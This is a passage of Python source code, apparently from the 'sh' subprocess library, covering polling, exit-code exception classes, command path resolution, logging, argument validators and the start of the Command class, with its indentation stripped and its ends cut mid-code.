self._poll = select.poll()
# file descriptor <-> file object bidirectional maps
self.fd_lookup = {}
self.fo_lookup = {}
def __nonzero__(self):
return len(self.fd_lookup) != 0
def __len__(self):
return len(self.fd_lookup)
def _set_fileobject(self, f):
if hasattr(f, "fileno"):
fd = f.fileno()
self.fd_lookup[fd] = f
self.fo_lookup[f] = fd
else:
self.fd_lookup[f] = f
self.fo_lookup[f] = f
def _remove_fileobject(self, f):
if hasattr(f, "fileno"):
fd = f.fileno()
del self.fd_lookup[fd]
del self.fo_lookup[f]
else:
del self.fd_lookup[f]
del self.fo_lookup[f]
def _get_file_descriptor(self, f):
return self.fo_lookup.get(f)
def _get_file_object(self, fd):
return self.fd_lookup.get(fd)
def _register(self, f, events):
# f can be a file descriptor or file object
self._set_fileobject(f)
fd = self._get_file_descriptor(f)
self._poll.register(fd, events)
def register_read(self, f):
self._register(f, select.POLLIN | select.POLLPRI)
def register_write(self, f):
self._register(f, select.POLLOUT)
def register_error(self, f):
self._register(f, select.POLLERR | select.POLLHUP | select.POLLNVAL)
def unregister(self, f):
fd = self._get_file_descriptor(f)
self._poll.unregister(fd)
self._remove_fileobject(f)
def poll(self, timeout):
if timeout is not None:
# convert from seconds to milliseconds
timeout *= 1000
changes = self._poll.poll(timeout)
results = []
for fd, events in changes:
f = self._get_file_object(fd)
if events & (select.POLLIN | select.POLLPRI):
results.append((f, POLLER_EVENT_READ))
elif events & select.POLLOUT:
results.append((f, POLLER_EVENT_WRITE))
elif events & select.POLLHUP:
results.append((f, POLLER_EVENT_HUP))
elif events & (select.POLLERR | select.POLLNVAL):
results.append((f, POLLER_EVENT_ERROR))
return results
else:
class Poller(object):
def __init__(self):
self.rlist = []
self.wlist = []
self.xlist = []
def __nonzero__(self):
return len(self.rlist) + len(self.wlist) + len(self.xlist) != 0
def __len__(self):
return len(self.rlist) + len(self.wlist) + len(self.xlist)
@staticmethod
def _register(f, events):
if f not in events:
events.append(f)
@staticmethod
def _unregister(f, events):
if f in events:
events.remove(f)
def register_read(self, f):
self._register(f, self.rlist)
def register_write(self, f):
self._register(f, self.wlist)
def register_error(self, f):
self._register(f, self.xlist)
def unregister(self, f):
self._unregister(f, self.rlist)
self._unregister(f, self.wlist)
self._unregister(f, self.xlist)
def poll(self, timeout):
_in, _out, _err = select.select(self.rlist, self.wlist, self.xlist, timeout)
results = []
for f in _in:
results.append((f, POLLER_EVENT_READ))
for f in _out:
results.append((f, POLLER_EVENT_WRITE))
for f in _err:
results.append((f, POLLER_EVENT_ERROR))
return results
def encode_to_py3bytes_or_py2str(s):
""" takes anything and attempts to return a py2 string or py3 bytes. this
is typically used when creating command + arguments to be executed via
os.exec* """
fallback_encoding = "utf8"
if IS_PY3:
# if we're already bytes, do nothing
if isinstance(s, bytes):
pass
else:
s = str(s)
try:
s = bytes(s, DEFAULT_ENCODING)
except UnicodeEncodeError:
s = bytes(s, fallback_encoding)
else:
# attempt to convert the thing to unicode from the system's encoding
try:
s = unicode(s, DEFAULT_ENCODING)
# if the thing is already unicode, or it's a number, it can't be
# coerced to unicode with an encoding argument, but if we leave out
# the encoding argument, it will convert it to a string, then to unicode
except TypeError:
s = unicode(s)
# now that we have guaranteed unicode, encode to our system encoding,
# but attempt to fall back to something
try:
s = s.encode(DEFAULT_ENCODING)
except UnicodeEncodeError:
s = s.encode(fallback_encoding, "replace")
return s
def _indent_text(text, num=4):
lines = []
for line in text.split("\n"):
line = (" " * num) + line
lines.append(line)
return "\n".join(lines)
class ForkException(Exception):
def __init__(self, orig_exc):
tmpl = """
Original exception:
===================
%s
"""
msg = tmpl % _indent_text(orig_exc)
Exception.__init__(self, msg)
class ErrorReturnCodeMeta(type):
""" a metaclass which provides the ability for an ErrorReturnCode (or
derived) instance, imported from one sh module, to be considered the
subclass of ErrorReturnCode from another module. this is mostly necessary
in the tests, where we do assertRaises, but the ErrorReturnCode that the
program we're testing throws may not be the same class that we pass to
assertRaises
"""
def __subclasscheck__(self, o):
other_bases = set([b.__name__ for b in o.__bases__])
return self.__name__ in other_bases or o.__name__ == self.__name__
class ErrorReturnCode(Exception):
__metaclass__ = ErrorReturnCodeMeta
""" base class for all exceptions as a result of a command's exit status
being deemed an error. this base class is dynamically subclassed into
derived classes with the format: ErrorReturnCode_NNN where NNN is the exit
code number. the reason for this is it reduces boiler plate code when
testing error return codes:
try:
some_cmd()
except ErrorReturnCode_12:
print("couldn't do X")
vs:
try:
some_cmd()
except ErrorReturnCode as e:
if e.exit_code == 12:
print("couldn't do X")
it's not much of a savings, but i believe it makes the code easier to read """
truncate_cap = 750
def __reduce__(self):
return self.__class__, (self.full_cmd, self.stdout, self.stderr, self.truncate)
def __init__(self, full_cmd, stdout, stderr, truncate=True):
self.full_cmd = full_cmd
self.stdout = stdout
self.stderr = stderr
self.truncate = truncate
exc_stdout = self.stdout
if truncate:
exc_stdout = exc_stdout[:self.truncate_cap]
out_delta = len(self.stdout) - len(exc_stdout)
if out_delta:
exc_stdout += ("... (%d more, please see e.stdout)" % out_delta).encode()
exc_stderr = self.stderr
if truncate:
exc_stderr = exc_stderr[:self.truncate_cap]
err_delta = len(self.stderr) - len(exc_stderr)
if err_delta:
exc_stderr += ("... (%d more, please see e.stderr)" % err_delta).encode()
msg_tmpl = unicode("\n\n RAN: {cmd}\n\n STDOUT:\n{stdout}\n\n STDERR:\n{stderr}")
msg = msg_tmpl.format(
cmd=self.full_cmd,
stdout=exc_stdout.decode(DEFAULT_ENCODING, "replace"),
stderr=exc_stderr.decode(DEFAULT_ENCODING, "replace")
)
if not IS_PY3:
# Exception messages should be treated as an API which takes native str type on both
# Python2 and Python3. (Meaning, it's a byte string on Python2 and a text string on
# Python3)
msg = encode_to_py3bytes_or_py2str(msg)
super(ErrorReturnCode, self).__init__(msg)
class SignalException(ErrorReturnCode):
pass
class TimeoutException(Exception):
""" the exception thrown when a command is killed because a specified
timeout (via _timeout or .wait(timeout)) was hit """
def __init__(self, exit_code, full_cmd):
self.exit_code = exit_code
self.full_cmd = full_cmd
super(Exception, self).__init__()
SIGNALS_THAT_SHOULD_THROW_EXCEPTION = set((
signal.SIGABRT,
signal.SIGBUS,
signal.SIGFPE,
signal.SIGILL,
signal.SIGINT,
signal.SIGKILL,
signal.SIGPIPE,
signal.SIGQUIT,
signal.SIGSEGV,
signal.SIGTERM,
signal.SIGSYS,
))
# we subclass AttributeError because:
# https://github.com/ipython/ipython/issues/2577
# https://github.com/amoffat/sh/issues/97#issuecomment-10610629
class CommandNotFound(AttributeError):
pass
rc_exc_regex = re.compile(r"(ErrorReturnCode|SignalException)_((\d+)|SIG[a-zA-Z]+)")
rc_exc_cache = {}
SIGNAL_MAPPING = dict([(v, k) for k, v in signal.__dict__.items() if re.match(r"SIG[a-zA-Z]+", k)])
def get_exc_from_name(name):
""" takes an exception name, like:
ErrorReturnCode_1
SignalException_9
SignalException_SIGHUP
and returns the corresponding exception. this is primarily used for
importing exceptions from sh into user code, for instance, to capture those
exceptions """
exc = None
try:
return rc_exc_cache[name]
except KeyError:
m = rc_exc_regex.match(name)
if m:
base = m.group(1)
rc_or_sig_name = m.group(2)
if base == "SignalException":
try:
rc = -int(rc_or_sig_name)
except ValueError:
rc = -getattr(signal, rc_or_sig_name)
else:
rc = int(rc_or_sig_name)
exc = get_rc_exc(rc)
return exc
def get_rc_exc(rc):
""" takes a exit code or negative signal number and produces an exception
that corresponds to that return code. positive return codes yield
ErrorReturnCode exception, negative return codes yield SignalException
we also cache the generated exception so that only one signal of that type
exists, preserving identity """
try:
return rc_exc_cache[rc]
except KeyError:
pass
if rc >= 0:
name = "ErrorReturnCode_%d" % rc
base = ErrorReturnCode
else:
signame = SIGNAL_MAPPING[abs(rc)]
name = "SignalException_" + signame
base = SignalException
exc = ErrorReturnCodeMeta(name, (base,), {"exit_code": rc})
rc_exc_cache[rc] = exc
return exc
# we monkey patch glob. i'm normally generally against monkey patching, but i
# decided to do this really un-intrusive patch because we need a way to detect
# if a list that we pass into an sh command was generated from glob. the reason
# being that glob returns an empty list if a pattern is not found, and so
# commands will treat the empty list as no arguments, which can be a problem,
# ie:
#
# ls(glob("*.ojfawe"))
#
# ^ will show the contents of your home directory, because it's essentially
# running ls([]) which, as a process, is just "ls".
#
# so we subclass list and monkey patch the glob function. nobody should be the
# wiser, but we'll have results that we can make some determinations on
_old_glob = glob_module.glob
class GlobResults(list):
def __init__(self, path, results):
self.path = path
list.__init__(self, results)
def glob(path, *args, **kwargs):
expanded = GlobResults(path, _old_glob(path, *args, **kwargs))
return expanded
glob_module.glob = glob
def canonicalize(path):
return os.path.abspath(os.path.expanduser(path))
def which(program, paths=None):
""" takes a program name or full path, plus an optional collection of search
paths, and returns the full path of the requested executable. if paths is
specified, it is the entire list of search paths, and the PATH env is not
used at all. otherwise, PATH env is used to look for the program """
def is_exe(file_path):
return (os.path.exists(file_path) and
os.access(file_path, os.X_OK) and
os.path.isfile(os.path.realpath(file_path)))
found_path = None
fpath, fname = os.path.split(program)
# if there's a path component, then we've specified a path to the program,
# and we should just test if that program is executable. if it is, return
if fpath:
program = canonicalize(program)
if is_exe(program):
found_path = program
# otherwise, we've just passed in the program name, and we need to search
# the paths to find where it actually lives
else:
paths_to_search = []
if isinstance(paths, (tuple, list)):
paths_to_search.extend(paths)
else:
env_paths = os.environ.get("PATH", "").split(os.pathsep)
paths_to_search.extend(env_paths)
for path in paths_to_search:
exe_file = os.path.join(canonicalize(path), program)
if is_exe(exe_file):
found_path = exe_file
break
return found_path
def resolve_command_path(program):
path = which(program)
if not path:
# our actual command might have a dash in it, but we can't call
# that from python (we have to use underscores), so we'll check
# if a dash version of our underscore command exists and use that
# if it does
if "_" in program:
path = which(program.replace("_", "-"))
if not path:
return None
return path
def resolve_command(name, baked_args=None):
path = resolve_command_path(name)
cmd = None
if path:
cmd = Command(path)
if baked_args:
cmd = cmd.bake(**baked_args)
return cmd
class Logger(object):
""" provides a memory-inexpensive logger. a gotcha about python's builtin
logger is that logger objects are never garbage collected. if you create a
thousand loggers with unique names, they'll sit there in memory until your
script is done. with sh, it's easy to create loggers with unique names if
we want our loggers to include our command arguments. for example, these
are all unique loggers:
ls -l
ls -l /tmp
ls /tmp
so instead of creating unique loggers, and without sacrificing logging
output, we use this class, which maintains as part of its state, the logging
"context", which will be the very unique name. this allows us to get a
logger with a very general name, eg: "command", and have a unique name
appended to it via the context, eg: "ls -l /tmp" """
def __init__(self, name, context=None):
self.name = name
self.log = logging.getLogger("%s.%s" % (SH_LOGGER_NAME, name))
self.context = self.sanitize_context(context)
def _format_msg(self, msg, *a):
if self.context:
msg = "%s: %s" % (self.context, msg)
return msg % a
@staticmethod
def sanitize_context(context):
if context:
context = context.replace("%", "%%")
return context or ""
def get_child(self, name, context):
new_name = self.name + "." + name
new_context = self.context + "." + context
return Logger(new_name, new_context)
def info(self, msg, *a):
self.log.info(self._format_msg(msg, *a))
def debug(self, msg, *a):
self.log.debug(self._format_msg(msg, *a))
def error(self, msg, *a):
self.log.error(self._format_msg(msg, *a))
def exception(self, msg, *a):
self.log.exception(self._format_msg(msg, *a))
def default_logger_str(cmd, call_args, pid=None):
if pid:
s = "<Command %r, pid %d>" % (cmd, pid)
else:
s = "<Command %r>" % cmd
return s
class RunningCommand(object):
""" this represents an executing Command object. it is returned as the
result of __call__() being executed on a Command instance. this creates a
reference to a OProc instance, which is a low-level wrapper around the
process that was exec'd
this is the class that gets manipulated the most by user code, and so it
implements various convenience methods and logical mechanisms for the
underlying process. for example, if a user tries to access a
backgrounded-process's stdout/err, the RunningCommand object is smart enough
to know to wait() on the process to finish first. and when the process
finishes, RunningCommand is smart enough to translate exit codes to
exceptions. """
# these are attributes that we allow to pass through to OProc
_OProc_attr_whitelist = set((
"signal",
"terminate",
"kill",
"kill_group",
"signal_group",
"pid",
"sid",
"pgid",
"ctty",
"input_thread_exc",
"output_thread_exc",
"bg_thread_exc",
))
def __init__(self, cmd, call_args, stdin, stdout, stderr):
"""
cmd is a list, where each element is encoded as bytes (PY3) or str (PY2)
"""
# self.ran is used for auditing what actually ran. for example, in
# exceptions, or if you just want to know what was ran after the
# command ran
#
# here we're making a consistent unicode string out if our cmd.
# we're also assuming (correctly, i think) that the command and its
# arguments are the encoding we pass into _encoding, which falls back to
# the system's encoding
enc = call_args["encoding"]
self.ran = " ".join([shlex_quote(arg.decode(enc, "ignore")) for arg in cmd])
self.call_args = call_args
self.cmd = cmd
self.process = None
self._waited_until_completion = False
should_wait = True
spawn_process = True
# this is used to track if we've already raised StopIteration, and if we
# have, raise it immediately again if the user tries to call next() on
# us. https://github.com/amoffat/sh/issues/273
self._stopped_iteration = False
# with contexts shouldn't run at all yet, they prepend
# to every command in the context
if call_args["with"]:
spawn_process = False
get_prepend_stack().append(self)
if call_args["piped"] or call_args["iter"] or call_args["iter_noblock"]:
should_wait = False
# we're running in the background, return self and let us lazily
# evaluate
if call_args["bg"]:
should_wait = False
# redirection
if call_args["err_to_out"]:
stderr = OProc.STDOUT
done_callback = call_args["done"]
if done_callback:
call_args["done"] = partial(done_callback, self)
# set up which stream should write to the pipe
# TODO, make pipe None by default and limit the size of the Queue
# in oproc.OProc
pipe = OProc.STDOUT
if call_args["iter"] == "out" or call_args["iter"] is True:
pipe = OProc.STDOUT
elif call_args["iter"] == "err":
pipe = OProc.STDERR
if call_args["iter_noblock"] == "out" or call_args["iter_noblock"] is True:
pipe = OProc.STDOUT
elif call_args["iter_noblock"] == "err":
pipe = OProc.STDERR
# there's currently only one case where we wouldn't spawn a child
# process, and that's if we're using a with-context with our command
self._spawned_and_waited = False
if spawn_process:
log_str_factory = call_args["log_msg"] or default_logger_str
logger_str = log_str_factory(self.ran, call_args)
self.log = Logger("command", logger_str)
self.log.debug("starting process")
if should_wait:
self._spawned_and_waited = True
# this lock is needed because of a race condition where a background
# thread, created in the OProc constructor, may try to access
# self.process, but it has not been assigned yet
process_assign_lock = threading.Lock()
with process_assign_lock:
self.process = OProc(self, self.log, cmd, stdin, stdout, stderr,
self.call_args, pipe, process_assign_lock)
logger_str = log_str_factory(self.ran, call_args, self.process.pid)
self.log.context = self.log.sanitize_context(logger_str)
self.log.info("process started")
if should_wait:
self.wait()
def wait(self, timeout=None):
""" waits for the running command to finish. this is called on all
running commands, eventually, except for ones that run in the background
if timeout is a number, it is the number of seconds to wait for the process to resolve. otherwise block on wait.
this function can raise a TimeoutException, either because of a `_timeout` on the command itself as it was
launched, or because of a timeout passed into this method.
"""
if not self._waited_until_completion:
# if we've been given a timeout, we need to poll is_alive()
if timeout is not None:
waited_for = 0
sleep_amt = 0.1
alive = False
exit_code = None
if timeout < 0:
raise RuntimeError("timeout cannot be negative")
# while we still have time to wait, run this loop
# notice that alive and exit_code are only defined in this loop, but the loop is also guaranteed to run,
# defining them, given the constraints that timeout is non-negative
while waited_for <= timeout:
alive, exit_code = self.process.is_alive()
# if we're alive, we need to wait some more, but let's sleep before we poll again
if alive:
time.sleep(sleep_amt)
waited_for += sleep_amt
# but if we're not alive, we're done waiting
else:
break
# if we've made it this far, and we're still alive, then it means we timed out waiting
if alive:
raise TimeoutException(None, self.ran)
# if we didn't time out, we fall through and let the rest of the code handle exit_code.
# notice that we set _waited_until_completion here, only if we didn't time out. this allows us to
# re-wait again on timeout, if we catch the TimeoutException in the parent frame
self._waited_until_completion = True
else:
exit_code = self.process.wait()
self._waited_until_completion = True
if self.process.timed_out:
# if we timed out, our exit code represents a signal, which is
# negative, so let's make it positive to store in our
# TimeoutException
raise TimeoutException(-exit_code, self.ran)
else:
self.handle_command_exit_code(exit_code)
# if an iterable command is using an instance of OProc for its stdin,
# wait on it. the process is probably set to "piped", which means it
# won't be waited on, which means exceptions won't propagate up to the
# main thread. this allows them to bubble up
if self.process._stdin_process:
self.process._stdin_process.command.wait()
self.log.debug("process completed")
return self
def is_alive(self):
""" returns whether or not we're still alive. this call has side-effects on OProc """
return self.process.is_alive()[0]
def handle_command_exit_code(self, code):
""" here we determine if we had an exception, or an error code that we
weren't expecting to see. if we did, we create and raise an exception
"""
ca = self.call_args
exc_class = get_exc_exit_code_would_raise(code, ca["ok_code"], ca["piped"])
if exc_class:
exc = exc_class(self.ran, self.process.stdout, self.process.stderr, ca["truncate_exc"])
raise exc
@property
def stdout(self):
self.wait()
return self.process.stdout
@property
def stderr(self):
self.wait()
return self.process.stderr
@property
def exit_code(self):
self.wait()
return self.process.exit_code
def __len__(self):
return len(str(self))
def __enter__(self):
""" we don't actually do anything here because anything that should have
been done would have been done in the Command.__call__ call.
essentially all that has to happen is the command be pushed on the
prepend stack. """
pass
def __iter__(self):
return self
def next(self):
""" allow us to iterate over the output of our command """
if self._stopped_iteration:
raise StopIteration()
# we do this because if get blocks, we can't catch a KeyboardInterrupt
# so the slight timeout allows for that.
while True:
try:
chunk = self.process._pipe_queue.get(True, self.call_args["iter_poll_time"])
except Empty:
if self.call_args["iter_noblock"]:
return errno.EWOULDBLOCK
else:
if chunk is None:
self.wait()
self._stopped_iteration = True
raise StopIteration()
try:
return chunk.decode(self.call_args["encoding"], self.call_args["decode_errors"])
except UnicodeDecodeError:
return chunk
# python 3
__next__ = next
def __exit__(self, exc_type, exc_val, exc_tb):
if self.call_args["with"] and get_prepend_stack():
get_prepend_stack().pop()
def __str__(self):
""" in python3, should return unicode. in python2, should return a
string of bytes """
if IS_PY3:
return self.__unicode__()
else:
return unicode(self).encode(self.call_args["encoding"])
def __unicode__(self):
""" a magic method defined for python2. calling unicode() on a
RunningCommand object will call this """
if self.process and self.stdout:
return self.stdout.decode(self.call_args["encoding"], self.call_args["decode_errors"])
elif IS_PY3:
return ""
else:
return unicode("")
def __eq__(self, other):
return unicode(self) == unicode(other)
__hash__ = None # Avoid DeprecationWarning in Python < 3
def __contains__(self, item):
return item in str(self)
def __getattr__(self, p):
# let these three attributes pass through to the OProc object
if p in self._OProc_attr_whitelist:
if self.process:
return getattr(self.process, p)
else:
raise AttributeError
# see if strings have what we're looking for. we're looking at the
# method names explicitly because we don't want to evaluate self unless
# we absolutely have to, the reason being, in python2, hasattr swallows
# exceptions, and if we try to run hasattr on a command that failed and
# is being run with _iter=True, the command will be evaluated, throw an
# exception, but hasattr will discard it
if p in _unicode_methods:
return getattr(unicode(self), p)
raise AttributeError
def __repr__(self):
""" in python3, should return unicode. in python2, should return a
string of bytes """
try:
return str(self)
except UnicodeDecodeError:
if self.process:
if self.stdout:
return repr(self.stdout)
return repr("")
def __long__(self):
return long(str(self).strip())
def __float__(self):
return float(str(self).strip())
def __int__(self):
return int(str(self).strip())
def output_redirect_is_filename(out):
return isinstance(out, basestring)
def get_prepend_stack():
tl = Command.thread_local
if not hasattr(tl, "_prepend_stack"):
tl._prepend_stack = []
return tl._prepend_stack
def special_kwarg_validator(passed_kwargs, merged_kwargs, invalid_list):
s1 = set(passed_kwargs.keys())
invalid_args = []
for elem in invalid_list:
if callable(elem):
fn = elem
ret = fn(passed_kwargs, merged_kwargs)
invalid_args.extend(ret)
else:
elem, error_msg = elem
if s1.issuperset(elem):
invalid_args.append((elem, error_msg))
return invalid_args
def get_fileno(ob):
# in py2, this will return None. in py3, it will return an method that
# raises when called
fileno_meth = getattr(ob, "fileno", None)
fileno = None
if fileno_meth:
# py3 StringIO objects will report a fileno, but calling it will raise
# an exception
try:
fileno = fileno_meth()
except UnsupportedOperation:
pass
elif isinstance(ob, (int, long)) and ob >= 0:
fileno = ob
return fileno
def ob_is_fd_based(ob):
return get_fileno(ob) is not None
def ob_is_tty(ob):
""" checks if an object (like a file-like object) is a tty. """
fileno = get_fileno(ob)
is_tty = False
if fileno is not None:
is_tty = os.isatty(fileno)
return is_tty
def ob_is_pipe(ob):
fileno = get_fileno(ob)
is_pipe = False
if fileno:
fd_stat = os.fstat(fileno)
is_pipe = stat.S_ISFIFO(fd_stat.st_mode)
return is_pipe
def tty_in_validator(passed_kwargs, merged_kwargs):
# here we'll validate that people aren't randomly shotgun-debugging different tty options and hoping that they'll
# work, without understanding what they do
pairs = (("tty_in", "in"), ("tty_out", "out"))
invalid = []
for tty_type, std in pairs:
if tty_type in passed_kwargs and ob_is_tty(passed_kwargs.get(std, None)):
error = "`_%s` is a TTY already, so so it doesn't make sense to set up a TTY with `_%s`" % (std, tty_type)
invalid.append(((tty_type, std), error))
# if unify_ttys is set, then both tty_in and tty_out must both be True
if merged_kwargs["unify_ttys"] and not (merged_kwargs["tty_in"] and merged_kwargs["tty_out"]):
invalid.append((
("unify_ttys", "tty_in", "tty_out"),
"`_tty_in` and `_tty_out` must both be True if `_unify_ttys` is True"
))
return invalid
def fg_validator(passed_kwargs, merged_kwargs):
""" fg is not valid with basically every other option """
invalid = []
msg = """\
_fg is invalid with nearly every other option, see warning and workaround here:
https://amoffat.github.io/sh/sections/special_arguments.html#fg"""
whitelist = set(("env", "fg", "cwd"))
offending = set(passed_kwargs.keys()) - whitelist
if "fg" in passed_kwargs and passed_kwargs["fg"] and offending:
invalid.append(("fg", msg))
return invalid
def bufsize_validator(passed_kwargs, merged_kwargs):
""" a validator to prevent a user from saying that they want custom
buffering when they're using an in/out object that will be os.dup'ed to the
process, and has its own buffering. an example is a pipe or a tty. it
doesn't make sense to tell them to have a custom buffering, since the os
controls this. """
invalid = []
in_ob = passed_kwargs.get("in", None)
out_ob = passed_kwargs.get("out", None)
in_buf = passed_kwargs.get("in_bufsize", None)
out_buf = passed_kwargs.get("out_bufsize", None)
in_no_buf = ob_is_fd_based(in_ob)
out_no_buf = ob_is_fd_based(out_ob)
err = "Can't specify an {target} bufsize if the {target} target is a pipe or TTY"
if in_no_buf and in_buf is not None:
invalid.append((("in", "in_bufsize"), err.format(target="in")))
if out_no_buf and out_buf is not None:
invalid.append((("out", "out_bufsize"), err.format(target="out")))
return invalid
def env_validator(passed_kwargs, merged_kwargs):
""" a validator to check that env is a dictionary and that all environment variable
keys and values are strings. Otherwise, we would exit with a confusing exit code 255. """
invalid = []
env = passed_kwargs.get("env", None)
if env is None:
return invalid
if not isinstance(env, Mapping):
invalid.append(("env", "env must be dict-like. Got {!r}".format(env)))
return invalid
for k, v in passed_kwargs["env"].items():
if not isinstance(k, str):
invalid.append(("env", "env key {!r} must be a str".format(k)))
if not isinstance(v, str):
invalid.append(("env", "value {!r} of env key {!r} must be a str".format(v, k)))
return invalid
class Command(object):
""" represents an un-run system program, like "ls" or "cd". because it
represents the program itself (and not a running instance of it), it should
hold very little state. in fact, the only state it does hold is baked
arguments.
when a Command object is called, the result that is returned is a
RunningCommand object, which represents the Command put into an execution
state. """
thread_local = threading.local()
_call_args = {
"fg": False, # run command in foreground
# run a command in the background. commands run in the background
# ignore SIGHUP and do not automatically exit when the parent process
# ends
"bg": False,
# automatically report exceptions for background commands
"bg_exc": True,
"with": False, # prepend the command to every command after it
"in": None,
"out": None, # redirect STDOUT
"err": None, # redirect STDERR
"err_to_out": None, # redirect STDERR to STDOUT
# stdin buffer size
# 1 for line, 0 for unbuffered, any other number for that amount
"in_bufsize": 0,
# stdout buffer size, same values as above
"out_bufsize": 1,
"err_bufsize": 1,
# this is how big the output buffers will be for stdout and stderr.
# this is essentially how much output they will store from the process.
# we use a deque, so if it overflows past this amount, the first items
# get pushed off as each new item gets added.
#
# NOTICE
# this is not a *BYTE* size, this is a *CHUNK* size...meaning, that if
# you're buffering out/err at 1024 bytes, the internal buffer size will
# be "internal_bufsize" CHUNKS of 1024 bytes
"internal_bufsize": 3 * 1024 ** 2,
"env": None,
"piped": None,
"iter": None,
"iter_noblock": None,
# the amount of time to sleep between polling for the iter output queue
"iter_poll_time": 0.1,
"ok_code": 0,
"cwd": None,
# the separator delimiting between a long-argument's name and its value
# setting this to None will cause name and value to be two separate
# arguments, like for short options
# for example, --arg=derp, '=' is the long_sep
"long_sep": "=",
# the prefix used for long arguments
"long_prefix": "--",
# this is for programs that expect their input to be from a terminal.
# ssh is one of those programs
"tty_in": False,
"tty_out": True,
"unify_ttys": False,
"encoding": DEFAULT_ENCODING,
"decode_errors": "strict",
# how long the process should run before it is auto-killed
"timeout": None,
"timeout_signal": signal.SIGKILL,
# TODO write some docs on "long-running processes"
# these control whether or not stdout/err will get aggregated together
# as the process runs. this has memory usage implications, so sometimes
# with long-running processes with a lot of data, it makes sense to
# set these to true
"no_out": False,
"no_err": False,
"no_pipe": False,
# if any redirection is used for stdout or stderr, internal buffering
# of that data is not stored. this forces it to be stored, as if
# the output is being T'd to both the redirected destination and our
# internal buffers
"tee": None,
# will be called when a process terminates regardless of exception
"done": None,
# a tuple (rows, columns) of the desired size of both the stdout and
# stdin ttys, if ttys are being used
"tty_size": (20, 80),
# whether or not our exceptions should be truncated
"truncate_exc": True,
# a function to call after the child forks but before the process execs
"preexec_fn": None,
# UID to set after forking. Requires root privileges. Not supported on
# Windows.
"uid": None,
# put the forked process in its own process session?
"new_session": True,
# pre-process args passed into __call__. only really useful when used
# in .bake()
"arg_preprocess": None,
# a callable that produces a log message from an argument tuple of the
# command and the args
"log_msg": None,
# whether or not to close all inherited fds. typically, this should be True, as inheriting fds can be a security
# vulnerability
"close_fds": True,
# a whitelist of the integer fds to pass through to the child process. setting this forces close_fds to be True
"pass_fds": set(),
}
# this is a collection of validators to make sure the special kwargs make
# sense
_kwarg_validators = (
(("err", "err_to_out"), "Stderr is already being redirected"),
(("piped", "iter"), "You cannot iterate when this command is being piped"),
(("piped", "no_pipe"), "Using a pipe doesn't make sense if you've disabled the pipe"),
(("no_out", "iter"), "You cannot iterate over output if there is no output"),
(("close_fds", "pass_fds"), "Passing `pass_fds` forces `close_fds` to be True"),
tty_in_validator,
bufsize_validator,
env_validator,
fg_validator,
)
def __init__(self, path, search_paths=None):
found = which(path, search_paths)
self._path = encode_to_py3bytes_or_py2str("")
# is the command baked (aka, partially applied)?
self._partial = False
self._partial_baked_args = []
self._partial_call_args = {}
# bugfix for functools.wraps. issue #121
self.__name__ = str(self)
if not found:
raise CommandNotFound(path)
# the reason why we set the values early in the constructor, and again
# here, is for people who have tools that inspect the stack on
# exception. if CommandNotFound is raised, we need self._path and the
# other attributes to be set correctly, so repr() works when they're
# inspecting the stack. issue #304
self._path = encode_to_py3bytes_or_py2str(found)
self.__name__ = str(self)
def __getattribute__(self, name):
# convenience
get_attr = partial(object.__getattribute__, self)
val = None
if name.startswith("_"):
val = get_attr(name)
elif name == "bake":
val = get_attr("bake")
# here we have a way of getting past shadowed subcommands. for example,
# if "git bake" was a thing, we wouldn't be able to do `git.bake()`
# because `.bake()` is already a method. so we allow `git.bake_()`
elif name.endswith("_"):
name = name[:-1]
if val is None:
val = get_attr("bake")(name)
return val
@staticmethod
def _extract_call_args(kwargs):
""" takes kwargs that were passed to a command's __call__ and extracts
out the special keyword arguments, we return a tuple of special keyword
args, and kwargs that will go to the exec'ed command """
kwargs = kwargs.copy()
call_args = {}
for parg, default in Command._call_args.items():
key = "_" + parg
if key in kwargs:
call_args[parg] = kwargs[key]
del kwargs[key]
merged_args = Command._call_args.copy()
merged_args.update(call_args)
invalid_kwargs = special_kwarg_validator(call_args, merged_args, Command._kwarg_validators)
if invalid_kwargs:
exc_msg = []
for kwarg, error_msg in invalid_kwargs:
exc_msg.append(" %r: %s" % (kwarg, error_msg))
exc_msg = "\n".join(exc_msg)
raise TypeError("Invalid special arguments:\n\n%s\n" % exc_msg)
return call_args, kwargs
# TODO needs documentation
def bake(self, *args, **kwargs):
fn = type(self)(self._path)
fn._partial = True
call_args, kwargs = self._extract_call_args(kwargs)
pruned_call_args = call_args
for k, v in Command._call_args.items():
try:
if pruned_call_args[k] == v:
del pruned_call_args[k]
except KeyError:
continue
fn._partial_call_args.update(self._partial_call_args)
fn._partial_call_args.update(pruned_call_args)
fn._partial_baked_args.extend(self._partial_baked_args)
sep = pruned_call_args.get("long_sep", self._call_args["long_sep"])
prefix = pruned_call_args.get("long_prefix", self._call_args["long_prefix"])
fn._partial_baked_args.extend(compile_args(args, kwargs, sep, prefix))
return fn
def __str__(self):
""" in python3, should return unicode. in python2, should return a
string of bytes """
if IS_PY3:
return self.__unicode__()
else:
return self.__unicode__().encode(DEFAULT_ENCODING)
def __eq__(self, other):
return str(self) == str(other)
__hash__ = None # Avoid DeprecationWarning in Python < 3
def __repr__(self):
""" in python3, should return unicode. in python2, should return a
string of bytes """
return "<Command %r>" % str(self)
def __unicode__(self):
""" a magic method defined for python2. calling unicode() on a
self will call this """
baked_args = " ".join(item.decode(DEFAULT_ENCODING) for item in self._partial_baked_args)
if baked_args:
baked_args = " " + baked_args
return self._path.decode(DEFAULT_ENCODING) + baked_args
def __enter__(self):
self(_with=True)
def __exit__(self, exc_type, exc_val, exc_tb):
get_prepend_stack().pop()
def __call__(self, *args, **kwargs):
kwargs = kwargs.copy()
args = list(args)
# this will hold our final command, including arguments, that will be
# exec'ed
cmd = []
# this will hold a complete mapping of all our special keyword arguments
# and their values
call_args = Command._call_args.copy()
# aggregate any 'with' contexts
for prepend in get_prepend_stack():
pcall_args = prepend.call_args.copy()
# don't pass the 'with' call arg
pcall_args.pop("with", None)
call_args.update(pcall_args)
cmd.extend(prepend.cmd)
cmd.append(self._path)
# do we have an argument pre-processor? if so, run it. we need to do
# this early, so that args, kwargs are accurate
preprocessor = self._partial_call_args.get("arg_preprocess", None)
if preprocessor:
args, kwargs = preprocessor(args, kwargs)
# here we extract the special kwargs and override any
# special kwargs from the possibly baked command
extracted_call_args, kwargs = self._extract_call_args(kwargs)
call_args.update(self._partial_call_args)
call_args.update(extracted_call_args)
# handle a None. this is added back only to not break the api in the
# 1.* version. TODO remove this in 2.0, as "ok_code", if specified,
# should always be a definitive value or list of values, and None is
# ambiguous
if call_args["ok_code"] is None:
call_args["ok_code"] = 0
if not getattr(call_args["ok_code"], "__iter__", None):
